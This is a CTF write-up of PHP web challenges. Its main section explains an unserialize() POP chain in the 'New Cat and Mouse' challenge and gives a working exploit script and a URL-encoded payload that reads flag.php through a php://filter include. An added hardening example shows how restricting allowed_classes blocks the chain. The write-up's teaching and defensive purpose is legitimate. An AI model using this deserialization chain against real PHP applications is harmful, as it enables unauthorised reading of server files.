Contents
SIGNIN
New Cat and Mouse
baby_sql
SIGNIN
Sign in and capture the request in a proxy.
New Cat and Mouse
We see deserialization. Let's analyze it.
<?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);
class mouse
{
    public $v;
    public function __toString()
    {
        echo "Good. You caught the mouse:";
        include($this->v); // file inclusion happens here, so this is where flag.php has to be read
    }
}
class cat
{
    public $a;
    public $b;
    public $c;
    public function __destruct()
    {
        $this->dog();
        $this->b = $this->c;
        die($this->a);
    }
    public function dog()
    {
        $this->a = "I'm a vicious dog, Kitty";
    }
}
unserialize($_GET["cat"]);
?>
In short, we read flag.php through a php:// pseudo-protocol wrapper. When the cat object is destroyed, __destruct() first calls dog(), which overwrites a, then copies c into b, and finally calls die($this->a). If b is a reference to a, that copy puts c (a mouse object) into a, so die() converts the mouse to a string, __toString() runs, and include($this->v) loads the pseudo-protocol string stored in v.
So we build the pseudo-protocol string as the mouse's v, place the mouse in c, make b a reference to a, and let cat execute the pseudo-protocol.
exp
<?php
class mouse
{
    public $v = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class cat
{
    public $a;
    public $b;
    public $c;
}
$ee = new cat();
$ee->c = new mouse();
$ee->b = &$ee->a;
echo urlencode(serialize($ee));
?>
First build the pseudo-protocol string as the mouse, then build the cat: write the mouse (the pseudo-protocol) into c, make b a reference to a, then serialize and URL-encode the result.
Passing it in triggers the __toString function.
O%3A3%3A%22cat%22%3A3%3A%7Bs%3A1%3A%22a%22%3BN%3Bs%3A1%3A%22b%22%3BR%3A2%3Bs%3A1%3A%22c%22%3BO%3A5%3A%22mouse%22%3A1%3A%7Bs%3A1%3A%22v%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D
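As an added hardening example (my own code, not the challenge's or the writeup's), the same two classes with unserialize() restricted through the allowed_classes option, run against the payload from this writeup; it shows the chain never fires because no cat or mouse object is ever created:

```php
<?php
// Added hardening example, not part of the original challenge or writeup.
// The chain relies on unserialize() instantiating attacker-chosen classes
// (cat, mouse) and on the "R:2;" back-reference that aliases b to a.
// With ['allowed_classes' => false] every object in the input becomes a
// __PHP_Incomplete_Class, which has no __destruct or __toString, so neither
// die($this->a) nor include($this->v) can run.

class mouse
{
    public $v;
    public function __toString()
    {
        echo "Good. You caught the mouse:";
        include($this->v);
        return "";
    }
}

class cat
{
    public $a;
    public $b;
    public $c;
    public function __destruct()
    {
        $this->dog();
        $this->b = $this->c;
        die($this->a);
    }
    public function dog()
    {
        $this->a = "I'm a vicious dog, Kitty";
    }
}

// Returns true when the untrusted input produced only an inert placeholder
// object instead of a live cat/mouse gadget.
function unserialize_is_inert(string $input): bool
{
    $obj = unserialize($input, ['allowed_classes' => false]);
    return $obj instanceof __PHP_Incomplete_Class;
}

// The writeup's payload, URL-decoded (the string the exp script above emits).
$payload = 'O:3:"cat":3:{s:1:"a";N;s:1:"b";R:2;s:1:"c";'
         . 'O:5:"mouse":1:{s:1:"v";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}';

var_dump(unserialize_is_inert($payload)); // script keeps running; nothing is included
```

Note that allowed_classes only blocks instantiation: any class you do allow still gets its __wakeup/__destruct called, so the safer fix for untrusted input is to avoid unserialize() entirely and use json_decode() or a signed format instead.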
baby_sql
It is a POST request; capture the packet and run it through sqlmap.